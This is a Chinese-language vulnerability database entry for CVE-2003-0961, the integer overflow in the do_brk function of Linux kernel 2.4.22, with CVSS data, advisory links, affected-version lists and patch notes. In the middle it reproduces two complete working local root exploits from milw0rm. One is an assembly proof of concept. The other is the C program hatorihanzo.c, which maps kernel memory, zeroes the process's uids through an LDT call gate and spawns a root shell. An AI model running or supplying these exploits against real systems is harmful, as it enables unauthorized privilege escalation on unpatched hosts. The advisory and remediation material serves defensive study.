CVE-2003-0961
CVSS7.2
发布时间 :2003-12-15 00:00:00
修订时间 :2016-10-17 22:38:31
NMCOES    

[原文]Integer overflow in the do_brk function for the brk system call in Linux kernel 2.4.22 and earlier allows local users to gain root privileges.


[CNNVD]Linux kernel do_brk()参数边界检查不充分漏洞(CNNVD-200312-060)

        
        Linux是一款开放源代码操作系统。
        Linux内核包含的do_brk()函数对参数缺少充分边界检查,本地攻击者可以利用这个漏洞获得ROOT权限。
        最近运行在X86机器的Linux内核运行在X86机器的物理内存管理使用简单平坦内存模型,每个用户进程内存地址范围为从0到TASK_SIZE字节。超过此内存的限制不能被用户访问,并包含此数据结构的内核代码。用户进程被分为几个逻辑段,成为虚拟内存区域,内核跟踪和管理用户进程的虚拟内存区域提供切当的内存管理和内存保护处理。
        do_brk()是一个内部内核函数,用于间接调用管理进程的内存堆的增加和缩减(brk),它是一个mmap(2)系统调用的简化版本,只处理匿名映射(如未初始化数据),函数对其参数缺少正确的边界检查,可以利用建立任意大的虚拟内存区域,超过用户可访问的内存限制,因此此限制以上的内核内存会变成用户进程的一部分。
        一般用户进程的内存分布类似如下:
        bash$ cat /proc/self/maps
        08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat
        0804c000-0804d000 rw-p 00003000 03:02 207935 /bin/cat
        0804d000-0804e000 rwxp 00000000 00:00 0
        40000000-40015000 r-xp 00000000 03:02 207495 /lib/ld-2.3.2.so
        40015000-40016000 rw-p 00014000 03:02 207495 /lib/ld-2.3.2.so
        40016000-40017000 rw-p 00000000 00:00 0
        40020000-40021000 rw-p 00000000 00:00 0
        42000000-4212f000 r-xp 00000000 03:02 319985 /lib/tls/libc-2.3.2.so
        4212f000-42132000 rw-p 0012f000 03:02 319985 /lib/tls/libc-2.3.2.so
        42132000-42134000 rw-p 00000000 00:00 0
        bfffe000-c0000000 rwxp fffff000 00:00 0
        do_brk()函数在ELF和a.out装载器及brk(2)函数调用,这是三个不同渠道可用于利用这个do_brk()漏洞,成功利用此漏洞,进程内存可包含一个大的内存映射,如:
        080a5000-c891d000 rwxp 00000000 00:00 0
        本地攻击者可以利用这个漏洞完全控制系统,包括获得UID 0权限,修改内核代码和数据结构等。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0961
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0961
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-060
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000796
(UNKNOWN)  CONECTIVA  CLA-2003:796
http://isec.pl/papers/linux_kernel_do_brk.pdf
(UNKNOWN)  MISC  http://isec.pl/papers/linux_kernel_do_brk.pdf
http://marc.info/?l=bugtraq&m=107064798706473&w=2
(UNKNOWN)  BUGTRAQ  20031204 [iSEC] Linux kernel do_brk() vulnerability details
http://marc.info/?l=bugtraq&m=107064830206816&w=2
(UNKNOWN)  BUGTRAQ  20031204 Hot fix for do_brk bug
http://marc.info/?l=bugtraq&m=107394143105081&w=2
(UNKNOWN)  BUGTRAQ  20040112 SmoothWall Project Security Advisory SWP-2004:001
http://www.debian.org/security/2003/dsa-403
(VENDOR_ADVISORY)  DEBIAN  DSA-403
http://www.debian.org/security/2004/dsa-417
(UNKNOWN)  DEBIAN  DSA-417
http://www.debian.org/security/2004/dsa-423
(UNKNOWN)  DEBIAN  DSA-423
http://www.debian.org/security/2004/dsa-433
(UNKNOWN)  DEBIAN  DSA-433
http://www.debian.org/security/2004/dsa-439
(UNKNOWN)  DEBIAN  DSA-439
http://www.debian.org/security/2004/dsa-440
(UNKNOWN)  DEBIAN  DSA-440
http://www.debian.org/security/2004/dsa-442
(UNKNOWN)  DEBIAN  DSA-442
http://www.debian.org/security/2004/dsa-450
(UNKNOWN)  DEBIAN  DSA-450
http://www.debian.org/security/2004/dsa-470
(UNKNOWN)  DEBIAN  DSA-470
http://www.debian.org/security/2004/dsa-475
(UNKNOWN)  DEBIAN  DSA-475
http://www.kb.cert.org/vuls/id/301156
(UNKNOWN)  CERT-VN  VU#301156
http://www.mandriva.com/security/advisories?name=MDKSA-2003:110
(UNKNOWN)  MANDRAKE  MDKSA-2003:110
http://www.novell.com/linux/security/advisories/2003_049_kernel.html
(UNKNOWN)  SUSE  SuSE-SA:2003:049
http://www.redhat.com/support/errata/RHSA-2003-368.html
(UNKNOWN)  REDHAT  RHSA-2003:368
http://www.redhat.com/support/errata/RHSA-2003-389.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:389

- 漏洞信息

Linux kernel do_brk()参数边界检查不充分漏洞
高危 边界条件错误
2003-12-15 00:00:00 2005-10-20 00:00:00
本地  
        
        Linux是一款开放源代码操作系统。
        Linux内核包含的do_brk()函数对参数缺少充分边界检查,本地攻击者可以利用这个漏洞获得ROOT权限。
        最近运行在X86机器的Linux内核运行在X86机器的物理内存管理使用简单平坦内存模型,每个用户进程内存地址范围为从0到TASK_SIZE字节。超过此内存的限制不能被用户访问,并包含此数据结构的内核代码。用户进程被分为几个逻辑段,成为虚拟内存区域,内核跟踪和管理用户进程的虚拟内存区域提供切当的内存管理和内存保护处理。
        do_brk()是一个内部内核函数,用于间接调用管理进程的内存堆的增加和缩减(brk),它是一个mmap(2)系统调用的简化版本,只处理匿名映射(如未初始化数据),函数对其参数缺少正确的边界检查,可以利用建立任意大的虚拟内存区域,超过用户可访问的内存限制,因此此限制以上的内核内存会变成用户进程的一部分。
        一般用户进程的内存分布类似如下:
        bash$ cat /proc/self/maps
        08048000-0804c000 r-xp 00000000 03:02 207935 /bin/cat
        0804c000-0804d000 rw-p 00003000 03:02 207935 /bin/cat
        0804d000-0804e000 rwxp 00000000 00:00 0
        40000000-40015000 r-xp 00000000 03:02 207495 /lib/ld-2.3.2.so
        40015000-40016000 rw-p 00014000 03:02 207495 /lib/ld-2.3.2.so
        40016000-40017000 rw-p 00000000 00:00 0
        40020000-40021000 rw-p 00000000 00:00 0
        42000000-4212f000 r-xp 00000000 03:02 319985 /lib/tls/libc-2.3.2.so
        4212f000-42132000 rw-p 0012f000 03:02 319985 /lib/tls/libc-2.3.2.so
        42132000-42134000 rw-p 00000000 00:00 0
        bfffe000-c0000000 rwxp fffff000 00:00 0
        do_brk()函数在ELF和a.out装载器及brk(2)函数调用,这是三个不同渠道可用于利用这个do_brk()漏洞,成功利用此漏洞,进程内存可包含一个大的内存映射,如:
        080a5000-c891d000 rwxp 00000000 00:00 0
        本地攻击者可以利用这个漏洞完全控制系统,包括获得UID 0权限,修改内核代码和数据结构等。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用ulimit -d命令限制用户进程数据段大小可暂时修正此问题。
        厂商补丁:
        Linux
        -----
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://www.kernel.org/pub/linux/kernel/v2.4/patch-2.4.23.bz2

- 漏洞信息 (129)

Linux Kernel 2.4.22 "do_brk()" local Root Exploit (PoC) (EDBID:129)
linux local
2003-12-02 Verified
0 Christophe Devine
N/A [点击下载]
; Christophe Devine (devine at cr0.net) and Julien Tinnes (julien at cr0.org)
;
; This exploit uses sys_brk directly to expand his break and doesn't rely
; on the ELF loader to do it.
;
; To bypass a check in sys_brk against available memory, we use a high
; virtual address as base address
;
; In most case (let's say when no PaX w/ ASLR :) we have to move the stack
; so that we can expand our break
;


  BITS 32

                org     0xBFFF0000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      2                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      filesize                        ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align

  phdrsize      equ     $ - phdr

  _start:

		; ** Make sure the stack is not above us

                mov     eax, 163         ; mremap
                mov     ebx, esp
		
		and	ebx, ~(0x1000 - 1)	; align to page size

		mov	ecx, 0x1000	; we suppose stack is one page only
                mov     edx, 0x9000	; be sure it can't get mapped after
					; us
                mov     esi,1		; MREMAP_MAYMOVE
                int     0x80


		and	esp, (0x1000 - 1)	; offset in page
		add	esp, eax		; stack ptr to new location
						; nb: we don't fix
						; pointers so environ/cmdline
						; are not available

  		mov	eax,152		; mlockall (for tests as root)
  		mov	ebx,2		; MCL_FUTURE
  		int	0x80

		; get VMAs for the kernel memory

                mov     eax,45          ; brk
                mov     ebx,0xC0500000
		int	0x80

		
		mov	ecx, 4
  loop0:
		
  		mov	eax, 2		; fork
  		int	0x80
		loop	loop0

  _idle:

                mov     eax,162         ; nanosleep
                mov     ebx,timespec
                int     0x80
                jmp     _idle

  timespec      dd      10,0

  filesize      equ     $ - $$

; milw0rm.com [2003-12-02]
		

- 漏洞信息 (131)

Linux Kernel <= 2.4.22 (do_brk) Local Root Exploit (working) (EDBID:131)
linux local
2003-12-05 Verified
0 Wojciech Purczynski
N/A [点击下载]
/*
* hatorihanzo.c
* Linux kernel do_brk vma overflow exploit.
*
* The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>
*
* Further research and exploit development by
* Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.
*
* (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.
*
* COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE
* OF PRESENTED CODE IS STRICTLY PROHIBITED.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <paths.h>
#include <grp.h>
#include <setjmp.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/ucontext.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <asm/page.h>
#include <asm/segment.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB
#define MAGIC 0xdefaced /* I should've patented this number -cliph */
#define ENTRY_MAGIC 0
#define ENTRY_GATE 2
#define ENTRY_CS 4
#define ENTRY_DS 6
#define CS ((ENTRY_CS << 2) | 4)
#define DS ((ENTRY_DS << 2) | 4)
#define GATE ((ENTRY_GATE << 2) | 4 | 3)
#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)
#define TOP_ADDR 0xFFFFE000U
/* configuration */
unsigned task_size;
unsigned page;
uid_t uid;
unsigned address;
int dontexit = 0;
void fatal(char * msg)
{
fprintf(stderr, "[-] %s: %s\n", msg, strerror(errno));
if (dontexit) {
fprintf(stderr, "[-] Unable to exit, entering neverending loop.\n");
kill(getpid(), SIGSTOP);
for (;;) pause();
}
exit(EXIT_FAILURE);
}
void configure(void)
{
unsigned val;
task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;
uid = getuid();
}
void expand(void)
{
unsigned top = (unsigned) sbrk(0);
unsigned limit = address + PAGE_SIZE;
do {
if (sbrk(PAGE_SIZE) == NULL)
fatal("Kernel seems not to be vulnerable");
dontexit = 1;
top += PAGE_SIZE;
} while (top < limit);
}
jmp_buf jmp;
#define MAP_NOPAGE 1
#define MAP_ISPAGE 2
void sigsegv(int signo, siginfo_t * si, void * ptr)
{
struct ucontext * uc = (struct ucontext *) ptr;
int error_code = uc->uc_mcontext.gregs[REG_ERR];
(void)signo;
(void)si;
error_code = MAP_NOPAGE + (error_code & 1);
longjmp(jmp, error_code);
}
void prepare(void)
{
struct sigaction sa;
sa.sa_sigaction = sigsegv;
sa.sa_flags = SA_SIGINFO | SA_NOMASK;
sigemptyset(&sa.sa_mask);
sigaction(SIGSEGV, &sa, NULL);
}
int testaddr(unsigned addr)
{
int val;
val = setjmp(jmp);
if (val == 0) {
asm ("verr (%%eax)" : : "a" (addr));
return MAP_ISPAGE;
}
return val;
}
#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)
#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))
#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)
void map(unsigned * map)
{
unsigned addr = task_size;
unsigned bit = 1;
prepare();
while (addr < TOP_ADDR) {
if (testaddr(addr) == MAP_ISPAGE)
*map |= bit;
addr += PAGE_SIZE;
next(map, bit);
}
signal(SIGSEGV, SIG_DFL);
}
void find(unsigned * m)
{
unsigned addr = task_size;
unsigned bit = 1;
unsigned count;
unsigned tmp;
prepare();
tmp = address = count = 0U;
while (addr < TOP_ADDR) {
int val = testaddr(addr);
if (val == MAP_ISPAGE && (*m & bit) == 0) {
if (!tmp) tmp = addr;
count++;
} else {
if (tmp && count == LDT_PAGES) {
errno = EAGAIN;
if (address)
fatal("double allocation\n");
address = tmp;
}
tmp = count = 0U;
}
addr += PAGE_SIZE;
next(m, bit);
}
signal(SIGSEGV, SIG_DFL);
if (address)
return;
errno = ENOTSUP;
fatal("Unable to determine kernel address");
}
int modify_ldt(int, void *, unsigned);
void ldt(unsigned * m)
{
struct modify_ldt_ldt_s l;
map(m);
memset(&l, 0, sizeof(l));
l.entry_number = LDT_ENTRIES - 1;
l.seg_32bit = 1;
l.base_addr = MAGIC >> 16;
l.limit = MAGIC & 0xffff;
if (modify_ldt(1, &l, sizeof(l)) == -1)
fatal("Unable to set up LDT");
l.entry_number = ENTRY_MAGIC / 2;
if (modify_ldt(1, &l, sizeof(l)) == -1)
fatal("Unable to set up LDT");
find(m);
}
asmlinkage void kernel(unsigned * task)
{
unsigned * addr = task;
/* looking for uids */
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid)
addr++;
addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */
addr[8] = 0;
/* looking for vma */
for (addr = (unsigned *) task_size; addr; addr++) {
if (addr[0] >= task_size && addr[1] < task_size &&
addr[2] == address && addr[3] >= task_size) {
addr[2] = task_size - PAGE_SIZE;
addr = (unsigned *) addr[3];
addr[1] = task_size - PAGE_SIZE;
addr[2] = task_size;
break;
}
}
}
void kcode(void);
#define __str(s) #s
#define str(s) __str(s)
void __kcode(void)
{
asm(
"kcode: \n"
" pusha \n"
" pushl %es \n"
" pushl %ds \n"
" movl $(" str(DS) ") ,%edx \n"
" movl %edx,%es \n"
" movl %edx,%ds \n"
" movl $0xffffe000,%eax \n"
" andl %esp,%eax \n"
" pushl %eax \n"
" call kernel \n"
" addl $4, %esp \n"
" popl %ds \n"
" popl %es \n"
" popa \n"
" lret \n"
);
}
void knockout(void)
{
unsigned * addr = (unsigned *) address;
if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)
fatal("Unable to change page protection");
errno = ESRCH;
if (addr[ENTRY_MAGIC] != MAGIC)
fatal("Invalid LDT entry");
/* setting call gate and privileged descriptors */
addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);
addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;
addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */
addr[ENTRY_CS+1] = 0x00cf9a00U;
addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */
addr[ENTRY_DS+1] = 0x00cf9200U;
prepare();
if (setjmp(jmp) != 0) {
errno = ENOEXEC;
fatal("Unable to jump to call gate");
}
asm("lcall $" str(GATE) ",$0x0"); /* this is it */
}
void shell(void)
{
char * argv[] = { _PATH_BSHELL, NULL };
execve(_PATH_BSHELL, argv, environ);
fatal("Unable to spawn shell\n");
}
void remap(void)
{
static char stack[8 MB]; /* new stack */
static char * envp[] = { "PATH=" _PATH_STDPATH, NULL };
static unsigned * m;
static unsigned b;
m = (unsigned *) sbrk(map_size);
if (!m)
fatal("Unable to allocate memory");
environ = envp;
asm ("movl %0, %%esp\n" : : "a" (stack + sizeof(stack)));
b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;
if (munmap((void*)b, task_size - b) == -1)
fatal("Unable to unmap stack");
while (b < task_size) {
if (sbrk(PAGE_SIZE) == NULL)
fatal("Unable to expand BSS");
b += PAGE_SIZE;
}
ldt(m);
expand();
knockout();
shell();
}
int main(void)
{
configure();
remap();
return EXIT_FAILURE;
}


// milw0rm.com [2003-12-05]
		

- 漏洞信息

2887
Linux Kernel do_brk local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

A flaw exists in the Linux kernel which allows a local user to map kernel memory segments into an unprivileged process. Specifically, the do_brk function does not verify that the allocated memory range does not exceed the TASK_SIZE constant. The do_brk function is called by the ELF executable loader and the mmap system call, however only the mmap method is exploitable. Once kernel memory access has been obtained, a number of tricks can be used to gain superuser privileges.

- 时间线

2003-12-01 Unknow
Unknow Unknow

- 解决方案

Upgrade the linux kernel to version 2.4.23 or higher, as it has been reported to fix this vulnerability. This can be done through various Linux vendor patches or manually installing a newer kernel. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Kernel do_brk Function Boundary Condition Vulnerability
Boundary Condition Error 9138
No Yes
2003-12-01 12:00:00 2009-07-12 12:56:00
Discovery of this vulnerability has been credited to Andrew Morton. This issue was also independently discovered by Paul Starzetz <ihaquer@isec.pl>.

- 受影响的程序版本

VMWare ESX Server 2.0.1 build 6403
VMWare ESX Server 2.0.1
VMWare ESX Server 2.0
VMWare ESX Server 1.5.2
Trustix Secure Linux 2.0
Sun Cobalt RaQ 550
SmoothWall Express 2.0
Linux kernel 2.6 -test9
Linux kernel 2.6 -test5
Linux kernel 2.6 -test4
Linux kernel 2.6 -test3
Linux kernel 2.6 -test2
Linux kernel 2.6 -test1
Linux kernel 2.5.69
Linux kernel 2.5.68
Linux kernel 2.5.67
Linux kernel 2.5.66
Linux kernel 2.5.65
Linux kernel 2.5.64
Linux kernel 2.5.63
Linux kernel 2.5.62
Linux kernel 2.5.61
Linux kernel 2.5.60
Linux kernel 2.5.59
Linux kernel 2.5.58
Linux kernel 2.5.57
Linux kernel 2.5.56
Linux kernel 2.5.55
Linux kernel 2.5.54
Linux kernel 2.5.53
Linux kernel 2.5.52
Linux kernel 2.5.51
Linux kernel 2.5.50
Linux kernel 2.5.49
Linux kernel 2.5.48
Linux kernel 2.5.47
Linux kernel 2.5.46
Linux kernel 2.5.45
Linux kernel 2.5.44
Linux kernel 2.5.43
Linux kernel 2.5.42
Linux kernel 2.5.41
Linux kernel 2.5.40
Linux kernel 2.5.39
Linux kernel 2.5.38
Linux kernel 2.5.37
Linux kernel 2.5.36
Linux kernel 2.5.35
Linux kernel 2.5.34
Linux kernel 2.5.33
Linux kernel 2.5.32
Linux kernel 2.5.31
Linux kernel 2.5.30
Linux kernel 2.5.29
Linux kernel 2.5.28
Linux kernel 2.5.27
Linux kernel 2.5.26
Linux kernel 2.5.25
Linux kernel 2.5.24
Linux kernel 2.5.23
Linux kernel 2.5.22
Linux kernel 2.5.21
Linux kernel 2.5.20
Linux kernel 2.5.19
Linux kernel 2.5.18
Linux kernel 2.5.17
Linux kernel 2.5.16
Linux kernel 2.5.15
Linux kernel 2.5.14
Linux kernel 2.5.13
Linux kernel 2.5.12
Linux kernel 2.5.11
Linux kernel 2.5.10
Linux kernel 2.5.9
Linux kernel 2.5.8
Linux kernel 2.5.7
Linux kernel 2.5.6
Linux kernel 2.5.5
Linux kernel 2.5.4
Linux kernel 2.5.3
Linux kernel 2.5.2
Linux kernel 2.5.1
Linux kernel 2.5 .0
Linux kernel 2.4.22
+ Devil-Linux Devil-Linux 1.0.5
+ Devil-Linux Devil-Linux 1.0.4
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Red Hat Fedora Core1
+ Slackware Linux 9.1
Linux kernel 2.4.21
+ Conectiva Linux 9.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Red Hat Enterprise Linux AS 3
+ RedHat Desktop 3.0
+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4
Astaro Security Linux 4.0 16
Astaro Security Linux 4.0 08
SGI ProPack 2.3
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Astaro Security Linux 4.0 17

- 不受影响的程序版本

SGI ProPack 2.3
Linux kernel 2.6 -test9
Linux kernel 2.6 -test8
Linux kernel 2.6 -test7
Linux kernel 2.6 -test6
Linux kernel 2.6 -test11
Linux kernel 2.6 -test10
Linux kernel 2.4.23
+ Trustix Secure Linux 2.0
Astaro Security Linux 4.0 17

- 漏洞讨论

A vulnerability has been discovered in the Linux kernel when handling user-supplied data passed to the do_brk() function. The problem is said to occur due to the do_brk() function failing to carry out sufficient sanity checking when handling address data supplied by a user. As a result, an attacker may be capable of gaining access to sensitive kernel memory. This could ultimately allow for the attacker to read and write to kernel memory, effectively allowing for elevation of local privileges.

- 漏洞利用

A reliable exploit to provide for privilege escalation has been developed by Paul Starzetz &lt;ihaquer@isec.pl&gt; and Wojciech Purczynski &lt;cliph@isec.pl&gt;. This exploit is presented in the following document:
http://isec.pl/papers/linux_kernel_do_brk.pdf

Debian has stated that a program designed to exploit this issue was discovered and analyzed on a compromised system. This exploit is not publicly available, however can be assumed that this program is being used to actively exploit systems in the wild.

A proof of concept exploit designed to crash a system has been made available by Christophe Devine &lt;DEVINE@iie.cnam.fr&gt;. A second proof of concept making use of the sys_brk kernel call has been developed and supplied by Julien TINNES &lt;julien@cr0.org&gt;.

CORE has developed a working commercial exploit for their IMPACT
product. This exploit is not otherwise publicly available or known
to be circulating in the wild.

- 解决方案

Sun has released a fix to address this issue in the Sun Cobalt RaQ 550. The fix is linked below.

Debian has released an advisory (DSA 423-1) that addresses the issue that is described in this BID for the IA-64 architecture. Further details regarding obtaining and applying fixes can be found in the referenced advisory.

RedHat has released security advisories RHSA-2003-389 and RHSA-2003:392-00 to address this issue. Additional information about associated fixes can be found in the appropriate advisory reference.

RedHat has also released advisory RHSA-2003:368-11 for affected versions of Enterprise Linux and Advanced Workstation Linux. Affected users are advised to run up2date to resolve this issue.

Debian has released a security advisory DSA-403-1 which contains a number of fixes to address this issue. Users are advised to see the referenced advisory for further details on how to obtain and apply fixes.

Mandrake has released a security advisory (MDKSA-2003:110) including fixes to address this issue. Information on how to obtain and apply fixes can be found in the referenced advisory.

Trustix has released a security advisory (TSLSA-2003-0046) including fixes to address this issue. Fixes are available below.

This issue has also been addressed in the Linux 2.4.23 and 2.6.0-test6 releases. Users are advised to upgrade as soon as possible.

Astaro has released fixes Astaro Security Linux 4.017 (new V4 ISO) and Up2date 4.017 to address this issue. Please see the referenced web sites for more information.

Slackware Linux has released an advisory SSA:2003-336-01 including fixes to address this issue.

SGI has released an advisory (20031201-01-A) to address this issue. SGI have reported that SGI ProPack version 2.3 is not vulnerable to this issue, customers who have not received ProPack version 2.3 CD's are advised to contact the SGI Support Provider. Please see the referenced advisory for further details.

TurboLinux has released a security announcment including fixes to address this issue.

Yellow Dog Linux has released advisory YDU-20031203-1 to address this issue.

Advisory SuSE-SA:2003:049 has been released by SuSE to resolve this issue.

Gentoo has released advisory 200312-02 to address this issue. Affected users are advised to perform the following actions:

emerge sync
emerge -pv [your preferred kernel sources]
emerge [your preferred kernel sources]
[update the /usr/src/linux symlink]
[compile and install your new kernel]
[emerge any necessary kernel module ebuilds]
[reboot]

Conectiva has released a security advisory CLA-2003:796 including fixes to address this issue.

SmoothWall has released fixes to address this issue in SmoothWall Express 2.0. Users are advised to obtain the fixes through the SmoothWall interface. Please see the referenced web page for more information. Users may download the fixes1 patch by carrying out the following steps:

Go to Maintenance -> Updates on your SmoothWall web interface, and upload the file called fixes1.

SGI has released a security advisory 20040102-01-U including fixes to address this issue. Please see the attached advisory for more information.

Debian has released advisory DSA-433-1 this issue for the mips and mipsel architectures.

VMWare has released a fix to address this issue in VMWare ESX Server 2.0.1 build 6403. Please see the referenced web page for more information.

Debian has released two advisories DSA-439-1 and DSA-440-1 to address this and other issues. Please see the referenced advisories for more information.

Debian has released DSA 442-1 to provide fixes for s390 platforms. Please see the attached advisory for further information.

Debian has released DSA 450-1 to provide MIPS kernel fixes. Please see the attached advisory for further details.

Debian has released DSA 470-1 to address this and other issues in the HP Precision architecture. Please see the referenced advisory for more information.

VMWare advisory and fixes available for their ESX server package. Please see th reference section for more information.

